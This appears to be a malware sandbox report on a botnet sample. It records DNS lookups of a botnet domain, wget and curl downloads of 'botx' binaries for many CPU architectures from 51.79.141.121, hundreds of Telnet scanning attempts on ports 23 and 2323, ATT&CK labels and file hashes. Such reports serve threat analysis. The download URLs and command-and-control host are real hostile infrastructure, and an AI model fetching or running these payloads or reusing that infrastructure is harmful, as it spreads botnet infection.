HTTP/1.1 404 Not Found

Date: Sun, 29 Dec 2024 21:38:20 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Content-Length: 213
Content-Type: text/html; charset=iso-8859-1
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.arm5

Request

GET /where/botx.arm5 HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 51.79.141.121
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 29 Dec 2024 21:38:30 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Last-Modified: Sat, 28 Dec 2024 16:49:23 GMT
ETag: "ae24-62a575c8dfc31"
Accept-Ranges: bytes
Content-Length: 44580
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.arm5

Request

GET /where/botx.arm5 HTTP/1.1
Host: 51.79.141.121
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 200 OK

Date: Sun, 29 Dec 2024 21:38:31 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Last-Modified: Sat, 28 Dec 2024 16:49:23 GMT
ETag: "ae24-62a575c8dfc31"
Accept-Ranges: bytes
Content-Length: 44580
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.arm6

Request

GET /where/botx.arm6 HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 51.79.141.121
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 29 Dec 2024 21:38:38 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Last-Modified: Sat, 28 Dec 2024 16:49:23 GMT
ETag: "10abc-62a575c8dfc31"
Accept-Ranges: bytes
Content-Length: 68284
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.arm6

Request

GET /where/botx.arm6 HTTP/1.1
Host: 51.79.141.121
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 200 OK

Date: Sun, 29 Dec 2024 21:38:39 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Last-Modified: Sat, 28 Dec 2024 16:49:23 GMT
ETag: "10abc-62a575c8dfc31"
Accept-Ranges: bytes
Content-Length: 68284
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.arm7

Request

GET /where/botx.arm7 HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 51.79.141.121
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 29 Dec 2024 21:38:45 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Last-Modified: Sat, 28 Dec 2024 16:49:23 GMT
ETag: "2028b-62a575c8dfc31"
Accept-Ranges: bytes
Content-Length: 131723
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.arm7

Request

GET /where/botx.arm7 HTTP/1.1
Host: 51.79.141.121
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 200 OK

Date: Sun, 29 Dec 2024 21:38:47 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Last-Modified: Sat, 28 Dec 2024 16:49:23 GMT
ETag: "2028b-62a575c8dfc31"
Accept-Ranges: bytes
Content-Length: 131723
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.ppc

Request

GET /where/botx.ppc HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 51.79.141.121
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 29 Dec 2024 21:38:58 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Last-Modified: Sat, 28 Dec 2024 16:49:23 GMT
ETag: "d9e8-62a575c8dfc31"
Accept-Ranges: bytes
Content-Length: 55784
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.ppc

Request

GET /where/botx.ppc HTTP/1.1
Host: 51.79.141.121
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 200 OK

Date: Sun, 29 Dec 2024 21:39:15 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Last-Modified: Sat, 28 Dec 2024 16:49:23 GMT
ETag: "d9e8-62a575c8dfc31"
Accept-Ranges: bytes
Content-Length: 55784
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.ppc440fp

Request

GET /where/botx.ppc440fp HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 51.79.141.121
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Sun, 29 Dec 2024 21:39:24 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Content-Length: 217
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.ppc440fp

Request

GET /where/botx.ppc440fp HTTP/1.1
Host: 51.79.141.121
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 404 Not Found

Date: Sun, 29 Dec 2024 21:39:24 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Content-Length: 217
Content-Type: text/html; charset=iso-8859-1
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.m68k

Request

GET /where/botx.m68k HTTP/1.1
User-Agent: Wget/1.19.4 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 51.79.141.121
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 29 Dec 2024 21:39:30 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Last-Modified: Sat, 28 Dec 2024 16:49:23 GMT
ETag: "da00-62a575c8dfc31"
Accept-Ranges: bytes
Content-Length: 55808
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
DNS

botnet.tfmobile.store

Request

botnet.tfmobile.store

IN A

Response

botnet.tfmobile.store

IN A

51.79.141.121
GET

http://51.79.141.121/where/botx.m68k

Request

GET /where/botx.m68k HTTP/1.1
Host: 51.79.141.121
User-Agent: curl/7.58.0
Accept: */*

Response

HTTP/1.1 200 OK

Date: Sun, 29 Dec 2024 21:39:31 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.3.33
Last-Modified: Sat, 28 Dec 2024 16:49:23 GMT
ETag: "da00-62a575c8dfc31"
Accept-Ranges: bytes
Content-Length: 55808

51.79.141.121:80

http://51.79.141.121/where/botx.x86

http

1.5kB
53.8kB
25
42

HTTP Request

GET http://51.79.141.121/where/botx.x86

HTTP Response

200
185.125.188.62:443

tls

135 B
2
185.125.188.62:443

tls

135 B
2
151.101.129.91:443

tls, https

233 B
40 B
1
1
151.101.129.91:443

extensions.gnome.org

tls

1.1kB
5.8kB
14
14
84.17.50.8:443

tls, https

235 B
40 B
1
1
84.17.50.9:443

odrs.gnome.org

tls

34.1kB
1.8MB
550
1286
51.79.141.121:80

http://51.79.141.121/where/botx.x86

http

1.3kB
53.8kB
23
42

HTTP Request

GET http://51.79.141.121/where/botx.x86

HTTP Response

200
51.79.141.121:80

http://51.79.141.121/where/botx.mips

http

1.9kB
76.6kB
33
58

HTTP Request

GET http://51.79.141.121/where/botx.mips

HTTP Response

200
220.162.42.102:2323

40 B
1
9.76.192.102:23

40 B
1
71.170.3.217:23

40 B
1
198.112.6.102:23

40 B
1
27.235.95.46:23

40 B
40 B
1
1
204.3.248.111:23

40 B
1
133.203.243.5:23

40 B
1
18.245.227.254:23

40 B
1
142.7.32.158:23

40 B
1
4.109.246.125:23

40 B
1
81.71.157.68:2323

40 B
1
164.208.104.244:23

40 B
1
206.115.226.121:23

40 B
1
220.217.37.212:23

40 B
1
5.87.89.158:23

40 B
1
77.53.214.71:23

40 B
1
9.87.51.254:23

40 B
1
145.83.105.63:23

40 B
1
79.128.192.148:23

40 B
1
45.208.116.34:23

40 B
1
50.108.211.58:2323

40 B
1
166.86.49.29:23

40 B
1
77.0.186.70:23

40 B
1
134.81.84.237:23

40 B
1
223.138.18.131:23

40 B
1
135.15.108.124:23

40 B
1
182.75.21.56:23

40 B
1
72.253.93.133:23

40 B
1
112.150.74.248:23

40 B
1
202.95.90.191:23

40 B
1
148.98.192.61:2323

40 B
1
133.166.129.89:23

40 B
1
38.67.61.90:23

40 B
1
43.35.190.122:23

40 B
1
69.126.236.20:23

40 B
1
119.77.166.73:23

40 B
1
128.88.62.91:23

40 B
1
135.138.223.182:23

40 B
1
41.214.83.11:23

40 B
1
162.216.85.198:23

40 B
1
217.61.182.224:2323

40 B
1
93.192.121.94:23

40 B
1
160.34.176.112:23

40 B
1
221.166.23.218:23

40 B
1
108.204.252.107:23

40 B
1
210.80.48.203:23

40 B
1
111.88.162.212:23

40 B
1
113.85.74.68:23

40 B
1
66.19.131.88:23

40 B
1
49.18.115.234:23

40 B
1
34.60.188.22:2323

40 B
1
103.10.253.185:23

40 B
1
120.251.199.192:23

40 B
1
60.28.135.100:23

40 B
1
8.132.166.201:23

40 B
1
203.249.223.66:23

40 B
1
87.108.214.164:23

40 B
1
136.225.172.44:23

40 B
1
47.12.217.211:23

40 B
1
18.12.164.215:23

40 B
1
146.77.7.94:2323

40 B
1
13.242.172.0:23

40 B
1
137.186.131.150:23

40 B
1
92.184.100.105:23

40 B
1
9.241.60.211:23

40 B
1
157.173.27.20:23

40 B
1
45.212.129.2:23

40 B
1
78.169.216.25:23

40 B
1
173.254.55.45:23

40 B
1
96.146.247.21:23

40 B
1
128.108.118.125:2323

40 B
1
133.229.3.211:23

40 B
1
49.81.13.195:23

40 B
1
183.69.237.129:23

40 B
1
162.178.43.251:23

40 B
1
111.63.203.22:23

40 B
1
217.75.67.164:23

40 B
1
167.101.184.139:23

40 B
1
220.151.135.224:23

40 B
1
73.69.17.115:23

40 B
1
180.246.238.214:2323

40 B
1
114.127.21.85:23

40 B
1
117.240.121.163:23

40 B
1
188.253.77.75:23

40 B
1
61.244.171.58:23

40 B
1
90.198.27.248:23

40 B
1
14.166.44.63:23

40 B
1
54.168.71.129:23

40 B
1
153.120.155.163:23

40 B
1
138.46.141.56:23

40 B
1
47.14.237.144:2323

40 B
1
104.136.78.252:23

40 B
1
216.91.191.187:23

40 B
1
182.200.26.48:23

40 B
1
141.234.174.252:23

40 B
1
219.71.171.49:23

40 B
1
161.50.231.26:23

40 B
1
64.55.152.53:23

40 B
1
145.145.184.53:23

40 B
1
175.47.209.174:23

40 B
1
158.93.123.7:2323

40 B
1
114.208.24.67:23

40 B
1
95.68.159.155:23

40 B
1
50.118.90.14:23

40 B
1
186.239.191.65:23

40 B
1
119.219.8.157:23

40 B
1
17.29.115.157:23

40 B
1
184.64.9.23:23

40 B
1
188.210.169.176:23

40 B
1
165.66.158.209:23

40 B
1
89.12.5.135:2323

40 B
1
53.59.104.86:23

40 B
1
128.252.88.203:23

40 B
1
76.194.4.196:23

40 B
1
80.136.103.58:23

40 B
1
1.82.125.242:23

40 B
1
212.176.118.124:23

40 B
1
155.182.114.59:23

40 B
1
71.6.239.63:23

40 B
1
182.0.183.66:23

40 B
1
111.45.201.208:2323

40 B
1
123.38.224.134:23

40 B
1
182.88.102.22:23

40 B
1
9.238.248.172:23

40 B
1
78.9.101.167:23

40 B
1
129.238.65.164:23

40 B
1
121.243.43.93:23

40 B
1
198.79.170.132:23

40 B
1
181.13.217.99:23

40 B
1
37.234.226.13:23

40 B
1
103.23.5.230:2323

40 B
1
212.223.187.184:23

40 B
1
193.2.116.18:23

40 B
1
69.218.139.109:23

40 B
1
158.152.181.231:23

40 B
1
54.48.159.147:23

40 B
1
68.41.128.214:23

40 B
1
174.147.157.211:23

40 B
1
49.128.22.240:23

40 B
1
211.64.173.214:23

40 B
1
113.200.180.239:2323

40 B
1
139.13.184.47:23

40 B
1
64.60.101.243:23

40 B
1
171.172.126.244:23

40 B
1
46.23.120.122:23

40 B
1
196.168.230.251:23

40 B
1
190.53.58.246:23

40 B
1
93.204.227.84:23

40 B
1
87.29.136.140:23

40 B
1
177.129.26.41:23

40 B
1
70.137.43.62:2323

40 B
1
112.198.62.64:23

40 B
1
113.152.83.225:23

40 B
1
5.126.190.30:23

40 B
1
123.243.106.15:23

40 B
1
207.40.113.154:23

40 B
1
162.192.102.181:23

40 B
1
141.148.133.64:23

40 B
1
71.159.5.86:23

40 B
1
31.234.126.102:23

40 B
1
157.130.86.224:2323

40 B
1
172.88.248.226:23

40 B
1
187.62.41.250:23

40 B
1
14.39.252.13:23

40 B
1
106.42.101.247:23

40 B
1
183.173.13.23:23

40 B
1
99.199.237.15:23

40 B
1
129.144.242.3:23

40 B
1
201.0.55.159:23

40 B
1
4.75.80.54:23

40 B
1
199.38.141.239:2323

40 B
1
183.216.158.101:23

40 B
1
23.233.97.239:23

40 B
1
135.162.88.39:23

40 B
1
159.113.68.63:23

40 B
1
196.208.52.237:23

40 B
1
93.201.75.70:23

40 B
1
24.148.246.108:23

40 B
1
220.32.6.237:23

40 B
1
61.105.185.60:23

40 B
1
45.236.244.223:2323

40 B
1
83.209.36.119:23

40 B
1
99.14.193.77:23

40 B
1
221.182.7.129:23

40 B
1
107.161.246.131:23

40 B
1
34.83.52.66:23

40 B
1
24.235.200.241:23

40 B
1
188.248.111.244:23

40 B
1
78.71.41.154:23

40 B
1
171.114.31.70:23

40 B
1
60.221.195.96:2323

40 B
1
5.225.71.173:23

40 B
1
72.2.75.167:23

40 B
1
66.233.104.167:23

40 B
1
85.196.131.121:23

40 B
1
179.89.35.7:23

40 B
1
24.207.20.200:23

40 B
1
223.213.26.62:23

40 B
1
54.18.75.111:23

40 B
1
177.10.239.161:23

40 B
1
95.73.9.86:2323

40 B
1
221.244.253.67:23

40 B
1
59.130.21.218:23

40 B
1
183.82.0.249:23

40 B
1
190.90.131.11:23

40 B
1
5.123.7.157:23

40 B
1
17.109.235.21:23

40 B
1
190.36.24.228:23

40 B
1
195.127.149.202:23

40 B
1
104.123.166.160:23

40 B
1
19.131.253.133:2323

40 B
1
24.10.115.86:23

40 B
1
160.219.186.183:23

40 B
1
2.193.247.185:23

40 B
1
53.201.200.11:23

40 B
1
186.102.189.170:23

40 B
1
27.75.102.254:23

40 B
1
102.155.131.56:23

40 B
1
109.4.212.18:23

40 B
1
31.86.192.241:23

40 B
1
12.193.56.120:2323

40 B
1
158.186.25.115:23

40 B
1
88.217.230.160:23

40 B
1
73.251.253.77:23

40 B
1
54.127.42.135:23

40 B
1
178.198.247.54:23

40 B
1
147.7.17.228:23

40 B
1
8.248.68.40:23

40 B
1
133.142.25.244:23

40 B
1
88.230.167.112:23

40 B
1
104.6.18.8:2323

40 B
1
103.130.115.185:23

40 B
1
212.253.194.73:23

40 B
1
68.91.237.110:23

40 B
1
158.126.239.61:23

40 B
1
89.52.60.54:23

40 B
1
111.21.108.251:23

40 B
1
157.198.146.101:23

40 B
1
46.186.112.207:23

40 B
1
176.221.2.83:23

40 B
1
54.27.36.45:2323

40 B
1
147.252.203.114:23

40 B
1
135.163.9.99:23

40 B
1
153.18.19.115:23

40 B
1
163.103.182.252:23

40 B
1
222.233.198.184:23

40 B
1
44.196.178.208:23

40 B
1
118.96.174.23:23

40 B
1
217.34.87.236:23

40 B
1
137.13.217.176:23

40 B
1
91.215.124.23:2323

40 B
1
119.144.121.168:23

40 B
1
211.95.215.107:23

40 B
1
52.179.247.148:23

40 B
1
172.138.255.145:23

40 B
1
44.129.181.251:23

40 B
1
171.147.238.168:23

40 B
1
185.74.23.168:23

40 B
1
52.52.183.165:23

40 B
1
128.167.31.87:23

40 B
1
192.200.175.107:2323

40 B
1
157.109.175.117:23

40 B
1
48.12.218.130:23

40 B
1
49.18.84.207:23

40 B
1
143.108.32.153:23

40 B
1
70.116.8.128:23

40 B
1
103.203.14.106:23

40 B
1
44.71.148.68:23

40 B
1
200.110.18.221:23

40 B
1
155.125.40.180:23

40 B
1
149.43.19.149:2323

40 B
1
31.146.59.92:23

40 B
1
174.78.168.96:23

40 B
1
62.158.69.188:23

40 B
1
77.158.252.12:23

40 B
1
111.141.62.210:23

40 B
1
193.127.95.159:23

40 B
1
220.218.96.24:23

40 B
1
95.50.242.2:23

40 B
1
183.160.204.195:23

40 B
1
168.247.144.137:2323

40 B
1
161.61.216.211:23

40 B
1
60.122.3.23:23

40 B
40 B
1
1
24.178.247.149:23

40 B
1
80.48.200.27:23

40 B
1
146.255.71.21:23

40 B
1
48.13.53.235:23

40 B
1
48.237.8.37:23

40 B
1
195.167.120.157:23

40 B
1
128.146.23.160:23

40 B
1
105.254.0.39:2323

40 B
1
82.189.217.93:23

40 B
1
57.8.220.242:23

40 B
1
72.153.110.22:23

40 B
1
122.12.251.172:23

40 B
1
177.249.165.36:23

40 B
40 B
1
1
125.55.77.22:23

40 B
1
50.223.191.217:23

40 B
1
14.163.0.63:23

40 B
1
78.38.228.38:23

40 B
1
170.47.161.106:2323

40 B
1
124.170.237.70:23

40 B
1
205.187.17.99:23

40 B
1
147.79.10.232:23

40 B
1
165.119.70.242:23

40 B
1
31.198.249.20:23

40 B
1
135.75.168.203:23

40 B
1
128.43.10.61:23

40 B
1
99.42.197.243:23

40 B
1
73.128.216.157:23

40 B
1
101.238.45.241:2323

40 B
1
65.216.104.78:23

40 B
1
149.219.150.15:23

40 B
1
1.130.116.205:23

40 B
1
53.208.122.87:23

40 B
1
112.87.210.76:23

40 B
1
147.136.205.180:23

40 B
1
218.4.162.63:23

40 B
1
182.177.55.92:23

40 B
1
54.127.166.40:23

40 B
1
181.31.160.178:2323

40 B
1
177.22.249.199:23

40 B
1
72.35.16.251:23

40 B
1
209.193.48.196:23

40 B
1
14.42.11.9:23

40 B
1
181.245.187.177:23

40 B
1
24.168.139.64:23

40 B
1
187.26.51.72:23

40 B
1
19.64.201.214:23

40 B
1
75.61.226.183:23

40 B
1
145.51.241.216:2323

40 B
1
81.215.255.53:23

40 B
1
80.138.15.27:23

40 B
1
44.191.119.84:23

40 B
1
197.151.125.88:23

40 B
1
167.49.204.237:23

40 B
1
79.163.70.62:23

40 B
1
218.54.30.79:23

40 B
1
208.21.162.166:23

40 B
1
8.82.53.17:23

40 B
1
102.39.70.29:2323

40 B
1
191.177.76.204:23

40 B
1
4.63.245.174:23

40 B
1
51.203.106.224:23

40 B
1
65.13.77.71:23

40 B
1
199.81.198.170:23

40 B
1
70.6.75.253:23

40 B
1
12.54.234.14:23

40 B
1
170.46.152.15:23

40 B
1
188.221.110.113:23

40 B
1
192.205.13.30:2323

40 B
1
94.218.181.160:23

40 B
1
219.162.10.114:23

40 B
1
189.226.255.80:23

40 B
1
123.68.115.189:23

40 B
1
192.115.107.249:23

40 B
1
126.201.3.5:23

40 B
1
46.161.149.133:23

40 B
1
88.3.62.28:23

40 B
1
20.154.101.2:23

40 B
1
13.104.59.130:2323

40 B
1
84.237.64.8:23

40 B
1
145.171.113.163:23

40 B
1
100.11.14.53:23

40 B
1
153.36.217.84:23

40 B
1
62.244.122.122:23

40 B
1
149.63.18.255:23

40 B
1
2.225.61.161:23

40 B
1
49.195.155.161:23

40 B
1
165.0.11.154:23

40 B
40 B
1
1
110.237.225.247:2323

40 B
1
45.122.86.246:23

40 B
1
160.76.168.85:23

40 B
1
148.36.3.61:23

40 B
1
206.153.171.108:23

40 B
1
101.157.209.206:23

40 B
1
112.61.21.179:23

40 B
1
182.12.61.65:23

40 B
1
5.101.122.199:23

40 B
1
102.46.227.255:23

40 B
1
189.87.165.185:2323

40 B
1
193.102.4.159:23

40 B
1
104.203.49.187:23

40 B
1
219.155.31.233:23

40 B
1
51.79.141.121:3007

botnet.tfmobile.store

60 B
40 B
1
1
51.79.141.121:80

http://51.79.141.121/where/botx.mips

http

1.8kB
76.5kB
33
58

HTTP Request

GET http://51.79.141.121/where/botx.mips

HTTP Response

200
165.21.74.39:2323

40 B
1
98.142.186.233:23

40 B
1
139.48.50.35:23

40 B
1
36.40.191.146:23

40 B
1
92.116.176.151:23

40 B
1
165.54.147.104:23

40 B
1
203.179.228.172:23

40 B
1
195.212.255.76:23

40 B
1
182.131.175.238:23

40 B
1
84.181.61.70:23

40 B
1
200.181.150.219:2323

40 B
1
2.76.201.12:23

40 B
1
181.38.58.154:23

40 B
1
65.192.252.213:23

40 B
1
200.74.239.13:23

40 B
1
183.154.0.52:23

40 B
1
181.107.100.91:23

40 B
1
43.174.64.1:23

40 B
1
53.211.62.3:23

40 B
1
5.65.73.28:23

40 B
1
120.133.215.107:2323

40 B
1
107.221.110.193:23

40 B
1
70.218.35.162:23

40 B
1
34.226.95.123:23

40 B
1
13.238.70.212:23

40 B
1
190.204.48.100:23

40 B
1
103.106.186.228:23

40 B
1
19.161.9.31:23

40 B
1
94.229.248.127:23

40 B
1
90.169.51.67:23

40 B
1
13.211.190.129:2323

40 B
1
188.88.246.74:23

40 B
1
191.106.113.164:23

40 B
1
143.1.165.66:23

40 B
1
217.99.49.185:23

40 B
1
141.135.188.29:23

40 B
1
155.87.226.111:23

40 B
1
51.99.165.27:23

40 B
1
106.243.24.197:23

40 B
1
163.168.202.247:23

40 B
1
208.233.186.148:2323

40 B
1
174.221.157.198:23

40 B
1
218.233.165.46:23

40 B
40 B
1
1
17.22.159.8:23

40 B
1
19.93.60.248:23

40 B
1
59.221.121.231:23

40 B
1
68.85.170.176:23

40 B
1
202.126.227.189:23

40 B
1
136.81.99.215:23

40 B
1
104.242.2.50:23

40 B
1
103.138.254.217:2323

40 B
1
23.47.233.138:23

40 B
1
153.224.200.11:23

40 B
1
23.143.237.97:23

40 B
1
206.32.152.76:23

40 B
1
114.69.15.31:23

40 B
1
107.140.225.84:23

40 B
1
139.50.178.156:23

40 B
1
144.80.31.143:23

40 B
1
193.79.64.229:23

40 B
1
9.156.114.111:2323

40 B
1
209.31.129.56:23

40 B
1
138.126.40.63:23

40 B
1
120.189.206.19:23

40 B
1
106.201.228.162:23

40 B
1
36.190.133.237:23

40 B
1
54.195.21.150:23

40 B
1
114.125.97.234:23

40 B
1
136.62.245.177:23

40 B
1
188.180.141.111:23

40 B
1
182.185.221.211:2323

40 B
1
105.29.98.158:23

40 B
1
171.223.120.19:23

40 B
1
5.213.166.127:23

40 B
1
216.151.34.147:23

40 B
1
173.63.150.242:23

40 B
1
23.178.213.8:23

40 B
1
219.17.219.186:23

40 B
1
73.172.74.227:23

40 B
1
142.149.126.225:23

40 B
1
125.78.7.70:2323

40 B
1
59.87.141.152:23

40 B
1
47.121.198.216:23

40 B
1
24.165.27.244:23

40 B
1
176.83.27.206:23

40 B
1
196.144.193.9:23

40 B
1
42.185.186.194:23

40 B
1
203.64.197.168:23

40 B
1
60.111.170.214:23

40 B
1
113.17.55.47:23

40 B
1
176.205.9.27:2323

40 B
1
153.218.183.151:23

40 B
1
43.116.173.160:23

40 B
1
221.145.103.110:23

40 B
1
38.95.48.178:23

40 B
1
73.210.203.200:23

40 B
1
193.147.135.58:23

40 B
1
186.37.142.79:23

40 B
1
160.62.195.122:23

40 B
1
165.38.23.159:23

40 B
1
136.241.103.56:2323

40 B
1

224.0.0.251:5353

146 B
2
1.1.1.1:53

1527653184.rsc.cdn77.org

dns

81 B
113 B
1
1

DNS Request

1527653184.rsc.cdn77.org

DNS Response

84.17.50.9

89.187.167.39
1.1.1.1:53

1527653184.rsc.cdn77.org

dns

81 B
137 B
1
1

DNS Request

1527653184.rsc.cdn77.org

DNS Response

2a02:6ea0:ca00::7

2a02:6ea0:ca00::8
8.8.8.8:53

botnet.tfmobile.store

dns

67 B
83 B
1
1

DNS Request

botnet.tfmobile.store

DNS Response

51.79.141.121

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/botx.x86

Filesize
50KB

MD5
1092f7846a6ca7a5e92ece0ea93ff82e

SHA1
140fd3e84c49d382e6b0f9a40730d1cd465f8347

SHA256
a5ddb64df4b96bfeae6860981f98b4845df83db34ffaf238548bede6067f15c2

SHA512
11ba6cdfba1784d5f2895f351def8d6a4dc0d5efd56b735978d1ff7416d2a52da07931250f37311362c8d522f7db89e3ac8bf1de890302afa6281ce2a2f6b2ba

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.